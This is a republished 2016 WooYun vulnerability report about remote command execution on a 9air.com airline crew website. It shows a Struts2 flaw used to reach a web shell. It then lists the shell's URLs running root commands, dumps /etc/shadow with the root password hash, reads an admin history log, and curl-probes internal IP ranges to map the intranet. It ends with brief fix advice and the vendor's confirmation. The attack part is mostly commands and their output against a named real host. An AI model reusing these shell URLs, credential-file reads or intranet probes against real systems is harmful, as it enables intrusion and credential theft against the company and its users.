神器而已之九元航空某站命令执行到Getshell再到简单的内网探测

admin
admin
admin
139803
文章
114
评论
2017年4月19日13:47:48评论337 views字数 234阅读0分46秒阅读模式
摘要

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-19: 厂商已经确认,细节仅向厂商公开
2016-04-29: 细节向核心白帽子及相关领域专家公开
2016-05-09: 细节向普通白帽子公开
2016-05-19: 细节向实习白帽子公开
2016-06-03: 细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2016-198198

漏洞标题: 神器而已之九元航空某站命令执行到Getshell再到简单的内网探测

相关厂商: 9air.com

漏洞作者: 路人甲

提交时间: 2016-04-19 16:30

公开时间: 2016-06-03 17:10

漏洞类型: 命令执行

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: struts 远程命令执行 远程代码执行

2人收藏

漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-19: 厂商已经确认,细节仅向厂商公开
2016-04-29: 细节向核心白帽子及相关领域专家公开
2016-05-09: 细节向普通白帽子公开
2016-05-19: 细节向实习白帽子公开
2016-06-03: 细节向公众公开

简要描述:

男女之间相处,男人要处处让着女人。就拿我来说,我做任何事就都让着女朋友,比如让她洗衣服,让她做饭,让她刷碗,让她收拾屋子……

详细说明:

code 区域 
http://crew.9air.com:8080/9airweb/allUserMap.action
 str2命令执行,少年该打补丁了。
 
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow
 
 root:$6$tt8sA3oimLmV/DQS$P2kOvG699Pl38HVdoxIU7z1BBJmTA5xjP87FS4T2VsCl42zq52UAhxhT1KyfGutLzjmZ5fZOmRFwr87CZyMlA.:16439:0:99999:7:::
 bin:*:15628:0:99999:7:::
 daemon:*:15628:0:99999:7:::
 adm:*:15628:0:99999:7:::
 lp:*:15628:0:99999:7:::
 sync:*:15628:0:99999:7:::
 shutdown:*:15628:0:99999:7:::
 halt:*:15628:0:99999:7:::
 mail:*:15628:0:99999:7:::
 uucp:*:15628:0:99999:7:::
 operator:*:15628:0:99999:7:::
 games:*:15628:0:99999:7:::
 gopher:*:15628:0:99999:7:::
 ftp:*:15628:0:99999:7:::
 nobody:*:15628:0:99999:7:::
 dbus:!!:16439::::::
 vcsa:!!:16439::::::
 rpc:!!:16439:0:99999:7:::
 rtkit:!!:16439::::::
 avahi-autoipd:!!:16439::::::
 abrt:!!:16439::::::
 rpcuser:!!:16439::::::
 nfsnobody:!!:16439::::::
 haldaemon:!!:16439::::::
 gdm:!!:16439::::::
 ntp:!!:16439::::::
 saslauth:!!:16439::::::
 postfix:!!:16439::::::
 pulse:!!:16439::::::
 sshd:!!:16439::::::
 tcpdump:!!:16439::::::
 clamav:!!:16829::::::
code 区域 
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=whoami
 root权限
code 区域 
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=ls%20/
 
 bin
 boot
 dev
 etc
 history.log
 home
 lib
 lib64
 logs
 lost+found
 media
 misc
 net
 opt
 proc
 root
 sbin
 selinux
 serverdir
 shirodemo.log
 shirodemo.log.2016-01-29
 shirodemo.log.2016-01-30
 shirodemo.log.2016-01-31
 shirodemo.log.2016-02-01
 shirodemo.log.2016-02-02
 shirodemo.log.2016-02-03
 shirodemo.log.2016-02-04
 shirodemo.log.2016-02-05
 shirodemo.log.2016-02-06
 shirodemo.log.2016-02-07
 shirodemo.log.2016-02-08
 shirodemo.log.2016-02-09
 shirodemo.log.2016-02-10
 shirodemo.log.2016-02-11
 shirodemo.log.2016-02-12
 shirodemo.log.2016-02-13
 shirodemo.log.2016-02-14
 shirodemo.log.2016-02-15
 shirodemo.log.2016-02-16
 shirodemo.log.2016-02-17
 shirodemo.log.2016-02-18
 shirodemo.log.2016-02-19
 shirodemo.log.2016-02-20
 shirodemo.log.2016-02-21
 shirodemo.log.2016-02-22
 shirodemo.log.2016-02-23
 shirodemo.log.2016-02-24
 shirodemo.log.2016-02-25
 shirodemo.log.2016-02-26
 shirodemo.log.2016-02-27
 shirodemo.log.2016-02-28
 shirodemo.log.2016-02-29
 shirodemo.log.2016-03-01
 shirodemo.log.2016-03-02
 shirodemo.log.2016-03-03
 shirodemo.log.2016-03-04
 shirodemo.log.2016-03-05
 shirodemo.log.2016-03-06
 shirodemo.log.2016-03-07
 shirodemo.log.2016-03-08
 shirodemo.log.2016-03-09
 shirodemo.log.2016-03-10
 shirodemo.log.2016-03-11
 shirodemo.log.2016-03-12
 shirodemo.log.2016-03-13
 shirodemo.log.2016-03-14
 shirodemo.log.2016-03-15
 shirodemo.log.2016-03-16
 shirodemo.log.2016-03-17
 shirodemo.log.2016-03-18
 shirodemo.log.2016-03-19
 shirodemo.log.2016-03-20
 shirodemo.log.2016-03-21
 shirodemo.log.2016-03-22
 shirodemo.log.2016-03-23
 shirodemo.log.2016-03-24
 shirodemo.log.2016-03-25
 shirodemo.log.2016-03-26
 shirodemo.log.2016-03-27
 shirodemo.log.2016-03-28
 shirodemo.log.2016-03-29
 shirodemo.log.2016-03-30
 shirodemo.log.2016-03-31
 shirodemo.log.2016-04-01
 shirodemo.log.2016-04-02
 shirodemo.log.2016-04-03
 shirodemo.log.2016-04-04
 shirodemo.log.2016-04-05
 shirodemo.log.2016-04-06
 shirodemo.log.2016-04-07
 shirodemo.log.2016-04-08
 shirodemo.log.2016-04-09
 shirodemo.log.2016-04-10
 shirodemo.log.2016-04-11
 shirodemo.log.2016-04-12
 shirodemo.log.2016-04-13
 shirodemo.log.2016-04-
 14
 shirodemo.log.2016-04-15
 shirodemo.log.2016-04-16
 shirodemo.log.2016-04-17
 shirodemo.log.2016-04-18
 soft
 software
 srv
 sys
 tmp
 usr
 var
 weixin
code 区域 
有历史命令文件
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/history.log
 
 这就好玩了.....
 
 414  select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist   inner   join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier   and inf.o_flt_no = oolist.o_flt_no       and     inf.o_flt_org_apt = oolist.o_flt_org_apt              and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1   and    inf.o_flt_id =    ?      and    inf.o_flt_leg_th =    ?      and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender  
   415  2015-12-09 16:16:56,603 DEBUG [java.sql.PreparedStatement] - {pstm-100145} Executing Statement:    select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist   inner   join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier   and inf.o_flt_no = oolist.o_flt_no       and     inf.o_flt_org_apt = oolist.o_flt_org_apt              and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1   and    inf.o_flt_id =    ?      and    inf.o_flt_leg_th =    ?      and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender  
   416  [DEBUG] 2015-12-09 16:16:56,603 - {pstm-100145} Executing Statement:    select 
 count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist   inner   join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier   and inf.o_flt_no = oolist.o_flt_no       and     inf.o_flt_org_apt = oolist.o_flt_org_apt              and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1   and    inf.o_flt_id =    ?      and    inf.o_flt_leg_th =    ?      and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender 3171526575
   417  tail -f catalina.out 
 
 sql之类的,留着,可能后期会用到....
 
 754  ssh 
 
  756  ssh 
 内网貌似还蛮大的
 
 829  cd /
   830  ls
   831  cd /serverdir/
   832  ls
   833  cd tomcat/
   834  ls
   835  cd apache-tomcat-7.0.57/
   836  ls
   837  cd webapps/
   838  ls
   839  cd test/
   840  ls
   841  cd ..
   842  rm -rf test
 
   843  ls
   844  cd 9airweb
   845  ls
   846  cat return_url.jsp 
   847  ll
   848  cat index_hd.jsp 
 
 web目录在这里
 
 怎么安装了安全狗?
 
  877  tar -zxvf safedog_linux64.tar.gz 
   878  ll
   879  cd safedog_linux64
   880  ls
   881  python install.py
   882  service safedog status
   883  python install.py
code 区域 
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/shirodemo.log.2016-04-15
 
 都是数据库的log

漏洞证明:

code 区域 
看了下hosts,没有什么内网的ip,截止目前为止,之收集到两个ip段
 10.10.2.x
 192.168.34.x
 不过看样子应该内网很大。
 继续探测
 本想用find把你们目录文件全部列出来的...算了吧....
 直接用粗暴的方法去探测内网了
 curl
 
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.24
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.25
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.31
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.14
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.15
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.17
 
 
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.42
 it wokes!
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.46
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.36
 
 
 http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.52/wechat/WEB-INF/web.xml  找到个没卵用的xml。
 写个小脚本去跑下。

神器而已之九元航空某站命令执行到Getshell再到简单的内网探测

修复方案:

1.打补丁;

2.删除那个历史命令文件;

3.检查系统日志,看看是否被骇客入侵;

4.别客气,eq击飞空中吊打运维。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-19 17:06

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-19 16:59 | backtrack丶yao ( 普通白帽子 | Rank:298 漏洞数:38 )

    0

    注孤生

  2. 2016-04-21 12:38 | 猪猪侠 神器而已之九元航空某站命令执行到Getshell再到简单的内网探测 ( 核心白帽子 | Rank:5372 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    1

    @举起手来 一看标题和描述就是你啊

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin